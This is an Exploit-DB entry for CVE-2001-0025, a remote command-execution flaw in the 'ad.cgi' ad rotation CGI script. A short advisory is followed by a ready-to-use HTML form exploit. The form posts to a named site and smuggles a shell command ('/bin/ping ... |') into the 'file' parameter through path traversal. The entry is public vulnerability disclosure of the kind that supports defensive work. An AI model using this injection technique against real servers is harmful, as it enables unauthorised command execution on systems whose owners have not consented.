Leif M. Wright - 'ad.cgi' 1.0 Unchecked Input

EDB-ID:

20504

CVE:

2001-0025

EDB Verified:

Author:

rpc

Type:

remote

Exploit:   /  

Platform:

CGI

Date:

2000-12-11

Vulnerable App: 
source: https://www.securityfocus.com/bid/2103/info

ad.cgi is an ad rotation script freely available, and written by Leif Wright. A problem exists in the script which may allow access to restricted resources.

The problem occurs in the method in which the script checks input. Due to insufficent validation of input, the script allows a user to execute programs on the local system by making use of the FORM method. This makes it possible for a malicious users to remotely execute commands on the system with the priviledges inherited by the HTTPD process. 

<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
<input type=submit value=run>
</form>
</html>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services